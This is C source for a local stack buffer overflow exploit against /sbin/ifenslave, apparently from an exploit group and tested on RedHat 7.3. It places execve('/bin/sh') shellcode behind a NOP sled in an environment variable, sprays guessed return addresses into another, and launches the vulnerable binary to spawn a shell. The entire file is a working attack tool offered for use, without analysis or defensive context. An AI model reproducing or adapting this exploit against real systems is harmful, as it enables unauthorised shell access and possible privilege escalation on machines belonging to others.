/*  0x333shit => /sbin/ifenslave exploit
 *
 *  tested on RedHat 7.3 (Vallhall)
 *  coded by c0wboy of 0utSid3rs
 *  | www.0x333.org |
 * 
 *  Is Not Suid Of Defaul
 *  Kep It Private Or Died!!!
 */

#include <stdio.h>
#include <stdlib.h>

#define OUTSIDE    31337
#define BUFFER     60
#define OFFST      0
#define NOP        0x90

#define GREEN "\033[32m"                //some colors
#define RED "\033[31m"
#define NORM "\033[0m"

unsigned char shellcode[] =
         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88"
         "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
         "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
         "\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
         "\xff\xff/bin/sh";

unsigned long get_sp() {
      __asm__("movl %esp, %eax");
}

main( int argc, char *argv[] )
{
   int x;
   char *buf, *out, *scooby; // scooby dooby doooooo :)
   long ret , *add_ptr ;
   int offset=OFFST; 

   if ( argc > 1 ) offset  = atoi( argv[1] );
      
   buf = malloc(BUFFER);  /* ret address */
   out = malloc(OUTSIDE); /* shellcode + nop */

   ret = get_sp() - offset;

   scooby = buf;
   add_ptr = (long *) scooby;
   for ( x = 0 ; x < BUFFER ; x += 4 ) {
     *(add_ptr++) = ret;
   }

   scooby = out;
   for ( x = 0 ; x < OUTSIDE - strlen(shellcode) - 1 ; x++ ) {
     *(scooby++) = NOP;
   }

   for (x = 0 ; x < strlen(shellcode) ; x++) {
     *(scooby++) = shellcode[x];
   }

   buf[BUFFER- 1]  = '\0';
   out[OUTSIDE- 1] = '\0';

   memcpy ( out , "OUT=" , 4 ) ; putenv(out);
   memcpy ( buf , "RET=" , 4 ) ; putenv(buf);

   fprintf( stdout, "\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n");
   fprintf( stdout, " ~   0x333shit - /bin/ifenslave sploit    ~ \n");
   fprintf( stdout, " ~         by c0wboy of 0utSid3rs         ~ \n");
   fprintf( stdout, " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n");
   fprintf( stdout, " [~] ret address : 0x%08x\n", ret); 
   fprintf( stdout, " [~] sending evil string ...\n\n");

   system("/sbin/ifenslave $RET");
}